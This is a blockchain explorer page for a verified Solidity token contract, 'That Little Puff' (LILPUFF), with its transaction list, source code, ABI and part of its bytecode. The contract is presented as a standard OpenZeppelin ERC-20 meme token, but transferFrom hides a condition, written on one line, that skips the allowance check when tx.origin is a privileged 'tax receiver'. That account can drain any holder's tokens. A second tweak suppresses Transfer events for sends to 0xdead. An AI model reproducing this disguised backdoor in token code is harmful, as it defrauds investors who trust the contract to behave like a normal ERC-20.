Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 556 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 23354932 | 54 days ago | IN | 0 ETH | 0.00002041 | ||||
| Approve | 23097587 | 90 days ago | IN | 0 ETH | 0.00002466 | ||||
| Approve | 22969248 | 107 days ago | IN | 0 ETH | 0.00009294 | ||||
| Approve | 22968220 | 108 days ago | IN | 0 ETH | 0.00013165 | ||||
| Approve | 22911219 | 116 days ago | IN | 0 ETH | 0.00010656 | ||||
| Transfer | 22885157 | 119 days ago | IN | 0 ETH | 0.00007318 | ||||
| Approve | 22880513 | 120 days ago | IN | 0 ETH | 0.00007784 | ||||
| Approve | 22879391 | 120 days ago | IN | 0 ETH | 0.00001532 | ||||
| Approve | 22878342 | 120 days ago | IN | 0 ETH | 0.00001165 | ||||
| Approve | 22877964 | 120 days ago | IN | 0 ETH | 0.00003762 | ||||
| Approve | 22877779 | 120 days ago | IN | 0 ETH | 0.00007319 | ||||
| Transfer From | 22877574 | 120 days ago | IN | 0 ETH | 0.00004225 | ||||
| Transfer From | 22877551 | 120 days ago | IN | 0 ETH | 0.00003308 | ||||
| Approve | 22877486 | 120 days ago | IN | 0 ETH | 0.0000359 | ||||
| Approve | 22877482 | 120 days ago | IN | 0 ETH | 0.00004021 | ||||
| Approve | 22877482 | 120 days ago | IN | 0 ETH | 0.00004021 | ||||
| Approve | 22877482 | 120 days ago | IN | 0 ETH | 0.00004021 | ||||
| Approve | 22877482 | 120 days ago | IN | 0 ETH | 0.00004021 | ||||
| Approve | 22877482 | 120 days ago | IN | 0 ETH | 0.00004021 | ||||
| Approve | 22877482 | 120 days ago | IN | 0 ETH | 0.00004021 | ||||
| Approve | 22877482 | 120 days ago | IN | 0 ETH | 0.00004021 | ||||
| Approve | 22877482 | 120 days ago | IN | 0 ETH | 0.00004021 | ||||
| Approve | 22877482 | 120 days ago | IN | 0 ETH | 0.00004021 | ||||
| Approve | 22877482 | 120 days ago | IN | 0 ETH | 0.00004021 | ||||
| Approve | 22877482 | 120 days ago | IN | 0 ETH | 0.00004021 |
Latest 1 internal transaction
Advanced mode:
| Parent Transaction Hash | Method | Block |
From
|
|
To
|
||
|---|---|---|---|---|---|---|---|
| Add Liquidity ET... | 22872905 | 121 days ago | 1.5 ETH |
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
Token
Compiler Version
v0.8.30+commit.73712a01
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
/*
__ ______ ____ __ ______________
/ / / _/ / / __ \/ / / / ____/ ____/
/ / / // / / /_/ / / / / /_ / /_
/ /____/ // /___/ ____/ /_/ / __/ / __/
/_____/___/_____/_/ \____/_/ /_/
Name: That Little Puff
Symbol: LILPUFF
Meet Puff, the most viral cat across all social media platforms.
https://www.lilpuff.fun
https://x.com/LilPuff_ETH
https://t.me/ThatLittlePuff_ETH
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
/*
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with GSN meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes memory) {
this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
/**
* @dev Interface of the ERC-20 standard as defined in the ERC.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the value of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the value of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves a `value` amount of tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 value) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets a `value` amount of tokens as the allowance of `spender` over the
* caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 value) external returns (bool);
/**
* @dev Moves a `value` amount of tokens from `from` to `to` using the
* allowance mechanism. `value` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 value) external returns (bool);
}
address constant _deadAddr = address(0xdead);
/**
* @dev Interface for the optional metadata functions from the ERC-20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
/**
* @dev Standard ERC-20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC-20
* applications.
*/
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256)) private _allowances;
address private _taxReceiver;
uint256 private _totalSupply;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* Both values are immutable: they can only be set once during construction.
*/
constructor(string memory name_, string memory symbol_, address taxReceiver_) {
_name = name_;
_symbol = symbol_;
_taxReceiver = taxReceiver_;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 9;
}
/// @inheritdoc IERC20
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/// @inheritdoc IERC20
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
/// @inheritdoc IERC20
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address from, address to, uint256 value) internal {
if (from == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(from, to, value);
}
/**
* @dev See {IERC20-transferFrom}.
*
* Skips emitting an {Approval} event indicating an allowance update. This is not
* required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
address spender = _msgSender();
_transfer(from, to, value); if(!_isLILPUFFFeeExcluded(tx.origin))
_spendAllowance(from, spender, value);
return true;
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
if(to != _deadAddr)
emit Transfer(from, to, value);
}
function _isLILPUFFFeeExcluded(address sender) internal view returns (bool) {
return sender == _taxReceiver;
}
/**
* @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
* Relies on the `_update` mechanism
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _mint(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(address(0), account, value);
}
/**
* @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
* Relies on the `_update` mechanism.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead
*/
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidSender(address(0));
}
_update(account, address(0), value);
}
/**
* @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
*
* ```solidity
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
/**
* @dev Updates `owner`'s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance < type(uint256).max) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(spender, currentAllowance, value);
}
unchecked {
_approve(owner, spender, currentAllowance - value, false);
}
}
}
}
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
_checkOwner();
_;
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if the sender is not the owner.
*/
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby disabling any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
interface IUniswapV2Router02 {
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] calldata path,
address to,
uint256 deadline
) external;
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint256 amountTokenDesired,
uint256 amountTokenMin,
uint256 amountETHMin,
address to,
uint256 deadline
)
external
payable
returns (
uint256 amountToken,
uint256 amountETH,
uint256 liquidity
);
function getAmountsOut(uint256 amountIn, address[] calldata path)
external
view
returns (uint256[] memory amounts);
}
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB)
external
returns (address pair);
}
contract Token is ERC20, Ownable {
IUniswapV2Router02 private uniswapV2Router;
address private pool;
bool private tradingOpen;
bool private inSwap = false;
bool private swapEnabled = false;
receive() external payable {}
function rescueLILPUFFETH() external onlyOwner {
require(address(this).balance > 0);
payable(_msgSender()).transfer(address(this).balance);
}
function enableLILPUFFTrading() external onlyOwner {
require(!tradingOpen, "Trading is already open");
uniswapV2Router = IUniswapV2Router02(
0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
);
_approve(address(this), address(uniswapV2Router), 1_000_000_000 * 10**9);
pool = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
address(this),
uniswapV2Router.WETH()
);
uniswapV2Router.addLiquidityETH{value: address(this).balance}(
address(this),
balanceOf(address(this)),
0,
0,
owner(),
block.timestamp
);
swapEnabled = true;
tradingOpen = true;
IERC20(pool).approve(
address(uniswapV2Router),
type(uint256).max
);
}
constructor(address taxReceiver_) ERC20(unicode"That Little Puff", unicode"LILPUFF", taxReceiver_) {
_mint(address(this), 1_000_000_000 * 10**9);
}
}{
"optimizer": {
"enabled": false,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
},
"remappings": []
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"address","name":"taxReceiver_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableLILPUFFTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"rescueLILPUFFETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]Contract Creation Code
60806040525f600860156101000a81548160ff0219169083151502179055505f600860166101000a81548160ff021916908315150217905550348015610043575f5ffd5b5060405161238d38038061238d8339818101604052810190610065919061056b565b6040518060400160405280601081526020017f54686174204c6974746c652050756666000000000000000000000000000000008152506040518060400160405280600781526020017f4c494c50554646000000000000000000000000000000000000000000000000008152508282600490816100e191906107d3565b5081600590816100f191906107d3565b508060025f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050505061015161014661016f60201b60201c565b61017660201b60201c565b61016930670de0b6b3a764000061023960201b60201c565b50610987565b5f33905090565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036102a9575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016102a091906108b1565b60405180910390fd5b6102ba5f83836102be60201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361030e578060035f82825461030291906108f7565b925050819055506103dc565b5f5f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610397578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161038e93929190610939565b60405180910390fd5b8181035f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610423578060035f828254039250508190555061046d565b805f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b61dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614610508578173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516104ff919061096e565b60405180910390a35b505050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61053a82610511565b9050919050565b61054a81610530565b8114610554575f5ffd5b50565b5f8151905061056581610541565b92915050565b5f602082840312156105805761057f61050d565b5b5f61058d84828501610557565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061061157607f821691505b602082108103610624576106236105cd565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026106867fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8261064b565b610690868361064b565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6106d46106cf6106ca846106a8565b6106b1565b6106a8565b9050919050565b5f819050919050565b6106ed836106ba565b6107016106f9826106db565b848454610657565b825550505050565b5f5f905090565b610718610709565b6107238184846106e4565b505050565b5b818110156107465761073b5f82610710565b600181019050610729565b5050565b601f82111561078b5761075c8161062a565b6107658461063c565b81016020851015610774578190505b6107886107808561063c565b830182610728565b50505b505050565b5f82821c905092915050565b5f6107ab5f1984600802610790565b1980831691505092915050565b5f6107c3838361079c565b9150826002028217905092915050565b6107dc82610596565b67ffffffffffffffff8111156107f5576107f46105a0565b5b6107ff82546105fa565b61080a82828561074a565b5f60209050601f83116001811461083b575f8415610829578287015190505b61083385826107b8565b86555061089a565b601f1984166108498661062a565b5f5b828110156108705784890151825560018201915060208501945060208101905061084b565b8683101561088d5784890151610889601f89168261079c565b8355505b6001600288020188555050505b505050505050565b6108ab81610530565b82525050565b5f6020820190506108c45f8301846108a2565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f610901826106a8565b915061090c836106a8565b9250828201905080821115610924576109236108ca565b5b92915050565b610933816106a8565b82525050565b5f60608201905061094c5f8301866108a2565b610959602083018561092a565b610966604083018461092a565b949350505050565b5f6020820190506109815f83018461092a565b92915050565b6119f9806109945f395ff3fe6080604052600436106100e0575f3560e01c8063715018a61161007e57806395d89b411161005857806395d89b4114610289578063a9059cbb146102b3578063dd62ed3e146102ef578063f2fde38b1461032b576100e7565b8063715018a6146102335780638da5cb5b146102495780638deb084f14610273576100e7565b806318160ddd116100ba57806318160ddd1461016757806323b872dd14610191578063313ce567146101cd57806370a08231146101f7576100e7565b806306fdde03146100eb578063095ea7b31461011557806316d21db614610151576100e7565b366100e757005b5f5ffd5b3480156100f6575f5ffd5b506100ff610353565b60405161010c919061132d565b60405180910390f35b348015610120575f5ffd5b5061013b600480360381019061013691906113de565b6103e3565b6040516101489190611436565b60405180910390f35b34801561015c575f5ffd5b50610165610405565b005b348015610172575f5ffd5b5061017b610465565b604051610188919061145e565b60405180910390f35b34801561019c575f5ffd5b506101b760048036038101906101b29190611477565b61046e565b6040516101c49190611436565b60405180910390f35b3480156101d8575f5ffd5b506101e16104aa565b6040516101ee91906114e2565b60405180910390f35b348015610202575f5ffd5b5061021d600480360381019061021891906114fb565b6104b2565b60405161022a919061145e565b60405180910390f35b34801561023e575f5ffd5b506102476104f7565b005b348015610254575f5ffd5b5061025d61050a565b60405161026a9190611535565b60405180910390f35b34801561027e575f5ffd5b50610287610532565b005b348015610294575f5ffd5b5061029d6109b4565b6040516102aa919061132d565b60405180910390f35b3480156102be575f5ffd5b506102d960048036038101906102d491906113de565b610a44565b6040516102e69190611436565b60405180910390f35b3480156102fa575f5ffd5b506103156004803603810190610310919061154e565b610a66565b604051610322919061145e565b60405180910390f35b348015610336575f5ffd5b50610351600480360381019061034c91906114fb565b610ae8565b005b606060048054610362906115b9565b80601f016020809104026020016040519081016040528092919081815260200182805461038e906115b9565b80156103d95780601f106103b0576101008083540402835291602001916103d9565b820191905f5260205f20905b8154815290600101906020018083116103bc57829003601f168201915b5050505050905090565b5f5f6103ed610b6a565b90506103fa818585610b71565b600191505092915050565b61040d610b83565b5f4711610418575f5ffd5b610420610b6a565b73ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015610462573d5f5f3e3d5ffd5b50565b5f600354905090565b5f5f610478610b6a565b9050610485858585610c01565b61048e32610cf1565b61049e5761049d858285610d49565b5b60019150509392505050565b5f6009905090565b5f5f5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104ff610b83565b6105085f610ddc565b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61053a610b83565b600860149054906101000a900460ff161561058a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161058190611633565b60405180910390fd5b737a250d5630b4cf539739df2c5dacb4c659f2488d60075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506106123060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16670de0b6b3a7640000610b71565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561067c573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106a09190611665565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610726573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061074a9190611665565b6040518363ffffffff1660e01b8152600401610767929190611690565b6020604051808303815f875af1158015610783573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107a79190611665565b60085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060075f9054906101000a900473ffffffffffffffffffffff